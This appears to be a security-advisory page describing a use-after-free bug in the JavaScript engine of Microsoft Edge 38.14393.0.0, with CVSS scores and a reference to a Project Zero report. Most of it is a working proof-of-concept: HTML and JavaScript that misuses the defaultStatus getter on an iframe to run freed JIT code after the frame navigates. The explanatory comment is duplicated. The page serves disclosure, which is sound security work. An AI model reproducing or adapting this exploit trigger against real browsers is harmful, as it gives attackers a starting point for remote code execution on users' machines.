Microsoft Edge 38.14393.0.0 JavaScript Engine Use-After-Free

2017.03.16
Risk: Medium
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 7.6/10
Impact Subscore: 10/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

<!-- I noticed that some javascript getters behave strangely. My test code: var whitelist = ["closed", "document", "frames", "length", "location", "opener", "parent", "self", "top", "window"]; var f = document.createElement("iframe"); f.onload = () => { f.onload = null; for (var x in window) { if (whitelist.indexOf(x) != -1) continue; try { window.__lookupGetter__(x).call(f.contentWindow); log(x); } catch (e) { } } }; f.src = "https://abc.xyz/"; document.body.appendChild(f); And after some plays, finally reached an UAF condition. PoC is attached. RIP will jump into the freed JIT code. Tested on Microsoft Edge 38.14393.0.0. --> <!-- Microsoft Edge: Undefined behavior on some getters I noticed that some javascript getters behave strangely. My test code: var whitelist = ["closed", "document", "frames", "length", "location", "opener", "parent", "self", "top", "window"]; var f = document.createElement("iframe"); f.onload = () => { f.onload = null; for (var x in window) { if (whitelist.indexOf(x) != -1) continue; try { window.__lookupGetter__(x).call(f.contentWindow); log(x); } catch (e) { } } }; f.src = "https://abc.xyz/"; document.body.appendChild(f); And after some plays, finally reached an UAF condition. PoC is attached. RIP will jump into the freed JIT code. Tested on Microsoft Edge 38.14393.0.0. --> <pre id="d"> </pre> <body></body> <script> function log(txt) { var c = document.createElement("div"); c.innerText = "log: " + txt; d.appendChild(c); } function main() { var f = document.createElement("iframe"); f.onload = () => { f.onload = () => { var status = window.__lookupGetter__("defaultStatus").call(f.contentWindow); var func_cons = status.constructor.constructor; var ff = func_cons("return 0x12345;"); for (var i = 0; i < 0x100000; i++) ff(); f.onload = () => { alert("get ready"); ff(); }; f.src = "about:blank"; }; //a = f.contentWindow; f.src = "about:blank"; }; document.body.appendChild(f); } main(); </script>

References:

https://bugs.chromium.org/p/project-zero/issues/detail?id=1043


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top